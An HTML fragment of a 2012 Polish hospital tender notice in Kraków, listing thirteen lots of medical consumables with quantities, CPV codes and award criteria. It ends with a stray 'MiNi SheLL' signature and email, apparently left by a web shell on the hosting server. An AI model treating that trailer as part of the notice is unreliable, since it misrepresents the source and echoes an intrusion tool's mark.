<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2012 godzina 11:00, miejsce: Kancelaria Szpitala, (budynek komendy), ul. Wrocławska 1-3, 30 - 901 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET1 Rękawice nitrylowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1.	Rękawice nitrylowe  AQL 1,0-1,5, oznakowane jako wyrób medyczny i środek ochrony osobistej,  posiadające certyfikat przydatności do kontaktu z żywnością. Mikroteksturowane .Opakowanie  a 100 szt	33141420-0	op	2500					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 Rękawice winylowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1.	Rękawice L,M,S x 100 szt winylowe . długość min 240 mm, rozmiar do wyboru przez zamawiającego, bezpudrowe	33141420-0	op.	1200					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet  3 szkiełka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Szkiełka nakrywkowe 18x18 x 100 szt.	33141000-0	op.	300					
2	Szkiełka nakrywkowe 24x40 x 100 szt.	33141000-0	op.	100					
3	Szkiełka nakrywkowe 24x50 x 100 szt.	33141000-0	op.	50					
4	Szkiełka nakrywkowe 24x 60 x 100 szt.	33141000-0	op.	100					
5	Szkiełka podst.1,1 szlif. matowe x 50 szt.	33141000-0	op.	200					
6	Szkiełka S-Frost Plus x 50 szt.	33141000-0	op.	5					
7	Szkiełka do Intry i kości.x 100szt.	33141000-0	op.	30					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet 4 Cewniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Cew. do ods. gór. dr. odd. CH10-CH 20 dł. min 450mm	33141200-2	szt.	6000					
2	 Cew. do pod. tl. przez nos min.150 cm	33141200-2	szt.	1200					
3	Kanka DOODB. 24mm x 25cm z końcówką 	33141200-2	szt.	300					
4	Kanka DOODB. 30mm x 40cm z końcówką 	33141200-2	szt.	300					
5	Zatyczki do cewn. pakowane pojedynczo, sterylne, schodkowe z motylkowym uchwytem x 100 szt	33141000-3	op.	10					
6	Cewnik FOLEY 12CH-CH24, pojemność balonu max 45 ML, wykonane z lateksu obustronnie silikonowanego, podwójne opakowanie: wewnętrzne foliowe, zewnętrzne papier-folia, oznaczenie rozmiaru i pojemności balonu na cewniku, rozmiar w zależności od zapotrzebowania	33141641-5	szt.	1200					
7	Worek na mocz z odpł. min. 2 L (max 2,5L) z podziałką jałowy	33141000-0	szt.	1200					
8	Rękawice foliowe x 100 szt.(męskie,żeńskie)	33141000-3	op.	100					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet 5 dren Redon.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Dren Redon Ch16 o długości 70 cm posiadający 7otworów bocznych pakowany wyłącznie prosto( nie może być zagięty, zwinięty)	33141640-8	Szt.	200					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet 6 dreny Ulmera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Dren do ran typ Ulmera ster. Od 10 CH/75 do  18 CH /75	33141640-8	 Szt.	400					
2	Dren do ran typ Ulmera ster. ze stalowym trocarem od 14Ch/75 perf. do 16Ch/75 na dł.12cm	33141640-8	 Szt.	50					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.40-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Pakiet 7 System aspiracyjno-próżniowego pobierania krwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Probówko-strzykawka do oznacznia morfologii z EDTA  wys. ok. 65 mm i szer.13 mm o poj 2-3ml dostowane do automatycznego podajnika w analizatorze hematologicznym Sysmex XT 2000i	33124110-9	szt.	45000					
2	Probówko-strzykawka koagulologiczna z 3,2 % cytrynianem sodu o szer. 9-11,5 mm i wysok. ok..66 mm o poj. 2-3 ml. dostosowane do analizatora koagulologicznego Sysmex Ca 560	33124110-9	szt.	23000					
3	Probówko-strzykawka do oznacznia biochemii z aktywatorem wykrzepiania -granulat o poj. 1,2 ml , dostosowane do analizatorów Konelab , Advia Centaur	33124110-9	szt.	300					
4	Probówko-strzykawka do oznacznia biochemii z aktywatorem wykrzepiania -granulat o poj. 4-5 ml , szer. 13 mm i  wys. ok.90 mm dostosowane do analizatorów Konelab , Advia Centaur XP	33124110-9	szt.	60000					
5	Probówko-strzykawka do OB z 3,8% cytrynianem sodu do automatycznego odczytu o wys ok.130mm i szer 8-8,5 mm poj. 3-4 ml+ czytnik do probówek jako bezpłatne użyczenie na czas trwania umowy.	33124110-9	szt.	9000					
6	Probówki do koagulologii z 3,2% cytrynianem sodu -pediatryczne o poj. 1,2 do 1,6ml 	33124110-9	szt.	200					
7	Probówki do oznacznia morfologii z EDTA - pediatryczne o poj. 1ml do 1,4 ml  wys. ok..66mm i śr. 8 mm lub 11,5mm dostowane do automatycznego podajnika w analizatorze hematologicznym Sysmex XT 2000i	33124110-9	szt.	400					
8	Probówki do separacji surowicy 9ml-10ml z granulatem przeznaczone dla celów krwiodawstwa	33124110-9	szt.	9000					
9	Igła systemowa 0,7/38 mm 22G, 0,8/38 mm 21G,0,9/38 mm 20G, 0,8x 25 mm(krótka),rozmiar do wyboru przy zamówieniu	33124110-9	szt.	55000					
10	Adaptery umożliwiające pobranie krwi z venflonu 	33124110-9	szt.	7000					
	Razem								
Wszystkie próbki powinny posiadać etykiety.
Wszystkie pozycje od jednego producenta.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.10-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8 Kraniki i koreczki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Przyrząd do pobierania i wstrzykiwania leków z butelek z filtrem bakteryjnym 0,45 ?m i zatyczką	33140000-3	szt.	500					
2	Kranik trójdrożny z wyczuwalnym i optycznym indykatorem położenia kranika otwarty/zamknięty	33140000-3	szt.	800					
3	Kranik trójdrożny z wyczuwalnym i optycznym indykatorem położenia kranika otwarty/zamknięty z przedłużeniem 25 cm	33140000-3	szt.	250					
4	Kranik trójdrożny z wyczuwalnym i optyvcznym  indykatorem położenia kranika otwarty/zamknięty z przedłużeniem 50 cm	33140000-3	szt.	500					
5	Koreczek LOCK	33140000-3	szt.	6000					
6	System 3-ch kraników trójdrożnych z przedłużeniem min 140 cm	33140000-3	szt.	80					
7	System 5-ciu kraników trójdrożnych z przedłużeniem min 140 cm	33140000-3	szt.	80					
8	Igła do blokad 0,6mm x 60mm   23 G x 2 2/5 x 100 szt.	33141320-9	op.	5					
9	Zestaw kroplówkowy do pomp infuzyjnych firmy B.Braun,infusomat długość 145 cm	33140000-3	szt.	100					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9 Strzykawki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Strzyk. ins. 1ML z igłą x 100szt.	33141310-6	op	4					
2	Strzykawka j.u. 2ML, czytelna niezmazywalna skala, kryza ograniczająca wysuwanie się tłoka, opakowanie jednostkowe typu blister - pack x 100szt.	33141310-6	op	150					
3	Strzykawka j.u. 5ML, czytelna niezmazywalna skala, kryza ograniczająca wysuwanie się tłoka, opakowanie jednostkowe typu blister - pack x 100szt.	33141310-6	op	250					
4	Strzykawka j.u. 10ML, czytelna niezmazywalna skala, kryza ograniczająca wysuwanie się tłoka, opakowanie jednostkowe typu blister - pack x 100szt	33141310-6	op	250					
5	Strzykawka j.u. 20ML, czytelna niezmazywalna skala, kryza ograniczająca wysuwanie się tłoka, opakowanie jednostkowe typu blister - pack x 100szt.	33141310-6	op	350					
6	Strzykawka JANET j.u. 100 ML z łącznikiem typu LUER	33141310-6	szt.	1500					
7	Strzykawka tuberkulinowa x 100szt. z igła	33141310-6	op	6					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10 Igły.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. brutto	Nazwa handlowa/ nr katalogowy
1	Igły inj. j.u. 0,45x 16mm x 100 szt.	33141320-9	op	100					
2	Igły inj. j.u. 0,5x25 mm x 100 szt.	33141320-9	op	100					
3	Igły inj. j.u. 0,6x30 mm x 100 szt.	33141320-9	op	100					
4	Igły inj. j.u. 0,7x30 mm x 100 szt.	33141320-9	op	200					
5	Igły inj. j.u. 0,8x40 mm x 100 szt.	33141320-9	op	300					
6	Igły inj. j.u. 0,9x40 mm x 100 szt.	33141320-9	op	100					
7	Igły inj. j.u. 1,1x40 mm x 100 szt.	33141320-9	op	100					
8	Igły inj. j.u. 1,2x40 mm x 100 szt.	33141320-9	op	400					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11 przyrządy do przetaczania płynów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa/ nr katalogowy
1	Przyrząd do przet. Krwi TS - komora kroplowa ok..10 cm	33194000-6	szt.	4000					
2	Przyrząd do przet. Płynów - komora kroplowa ok. 6 cm	33194000-6	szt.	12000					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Pakiet 12 kaniula.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa/ nr katalogowy
1	Kaniula dożylna wykonana z poliuretanu z min 4 paskami kontrastującymi ,dodatkowym portem i możliwością zastosowania mandrynów.       
Rozmiary : 0,9; 1,1; 1,3; 1,5; 1,7 	33141220-8
	szt	11000					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. jakość - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Pakiet 13 rurki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> L.p	 NAZWA MATERIAŁU	Kod CPV	j.m	Ilość	Cena jednostkowa netto	Wart. Netto	Stawka VAT	Wart. Brutto	Nazwa handlowa/ nr katalogowy
1	Rurka intubacyjna z mankietem  pokryta substancją zwiększającą poślizg (silikonowana ) lub wykonana z materiału o zwiększonym poślizgu typu Satin Soft,z zaznaczonym rozmiarem na baloniku kontrolnym, ze znacznikiem głębokości ,sterylna ,pojedynczo pakowana rozmiar do wyboru przez zamawiającego	33141000-0	szt.	500					
2	Rurka tracheostomijna z mankietem  wykonana z miękkiego PCV, silikonowana, sterylna,z prowadnicą ułatwiającą wprowadzenie( dopuszcza się ruchomą ramkę z bezstopniową regulacją ),  pojedynczo pakowana ,rozmiar do wyboru przez zamawiającego. W komplecie 2 tasiemki mocujące bawełniane.	33141000-0	szt.	150					
3	Prowadnica  do rurek intubacyjnych 	33141000-3	szt.	5					
4	Rurka intubacyjna  zbrojona z mankietem   rozmiar do wyboru przez zamawiającego ,sterylna ,pokryta substancją zwiększającą poślizg (silikonowana )lub  wykonana z materiału o poślizgu typu Satin Soft ,z zaznaczonym rozmiarem na baloniku kontrolnym,ze znacznikiem głębokości pojedynczo pakowana rozmiar do wyboru przez zamawiającego	33141000-0	szt.	150					
	Razem.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. jakość - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com